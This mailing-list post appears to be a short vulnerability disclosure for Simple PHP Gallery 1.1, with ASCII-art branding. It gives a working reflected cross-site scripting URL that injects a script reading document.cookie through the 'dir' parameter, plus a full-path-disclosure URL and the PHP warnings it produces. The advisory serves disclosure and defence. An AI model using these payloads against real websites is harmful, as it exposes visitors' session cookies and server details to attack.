[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Cross site scripting & fullpath disclosure



+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                                                 ;;ii,,::						+
+                                                 ::::            ::              ;;tt;;::          					+
+                                                 ;;::          ..,,::            ;;ii,,::          					+
+                           ,,,,                ii;;,,          ii;;::            ;;ii,,::          					+
+                           ii::                tt;;,,        ..tt;;,,..          ;;ii;;::          					+
+                         ii,,::                ttii,,        ..ff;;;;::          ;;ii;;::          					+
+                         tt;;::..,,            tt;;,,          ff;;;;ii          ;;ii,,::          					+
+                         tt;;::;;::            tt;;,,..        jj;;,,..          ;;tt,,::          					+
+                         tt;;;;,,              tt;;,,..        tt;;;;            ;;ii;;::          					+
+                     ..::,,;;,,                tt;;,,..        tt;;,,            ;;ii,,::          					+
+                 ..::,,ii;;;;..                tt;;,,..        iiii,,::          ;;ii,,::          					+
+               ::,,ttiijj;;,,                  tt;;;;..        ;;tt,,::          ;;ii,,::          					+
+             ,,;;ii    tt;;,,                  ii;;,,..        ..jj;;::          ;;ii;;::          					+
+           ;;;;::      tt;;::                  tt;;;;..          ff;;::          ;;tt,,..          					+
+         ii;;..      ,,ii;;::                  ii;;,,..          jj;;,,          ;;ii,,..          					+
+       ,,;;,,      ::;;;;;;::                  ii;;;;..          tt;;,,          ;;ii;;..          					+
+       tt;;::::  ::,,;;jj,,::                  tt;;,,..          tt;;,,          ;;ii,,..          					+
+       jj;;;;,,,,,,iiiiii;;::                ..tt;;,,::          iiii,,          ;;ii,,..          					+
+       ;;ffjjttjjttii  ii;;::                ii;;;;;;::          ..jj,,          ;;ii;;..          					+
+           ..;;..      ii;;,,::            ,,;;;;jj;;,,          ..jj,,          ;;ii,,..          					+
+                       iiii;;,,::::....::,,,,;;,,jj;;;;,,::    ::,,;;,,          ;;ii;;            					+
+                       ..ff;;;;;;,,,,::,,;;;;;;  ttii;;;;,,,,,,,,;;;;::          ;;ii,,            					+
+                         jjii;;;;;;;;;;;;;;ii..  ..ff;;;;;;;;;;;;;;;;            ;;ii,,            					+
+                           jjjj;;;;ii;;;;tt..      iijj;;;;;;;;;;ii::            ;;ii::            					+
+                             iijjjjjjtt;;            ;;ffffjjjjtt::              ;;ii              					+
+                                                           ;;..                  ii;;              					+
+                                                                                 ..       						+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Credit by : Al7ejaz Hacker														+
+																	+
+Script : Simple PHP Gallery 1.1													+
+Impact : Cross site scripting & fullpath disclosure											+
+																	+
+																	+
+Fullpath disclosure :															+
+																	+
+http://localhost/sp_index.php?dir=[Somthingwrong]											+
+																	+
+Result																	+
+																	+
+																	+
+Warning: opendir(123): failed to open dir: No such file or directory in /var/www/html/gallery/sp_helper_functions.php on line 10	+
+																	+
+Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/html/gallery/sp_helper_functions.php on line 11	+
+																	+
+Warning: Invalid argument supplied for foreach() in /var/www/html/gallery/sp_def_vars.php on line 147					+
+																	+
+																	+
+																	+
+																	+
+Cross Site Scripting															+
+																	+
+																	+
+																	+
+dir variable is not probrely verified and can be used to execute html and javascript code						+
+																	+
+http://localhost/sp_index.php?dir=<script>alert(document.cookie)</script>								+
+																	+
+/Milw0rm																+
+																	+
+																	+
+in subject hot :  Cross site scripting & fullpath disclosure  ;)									+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++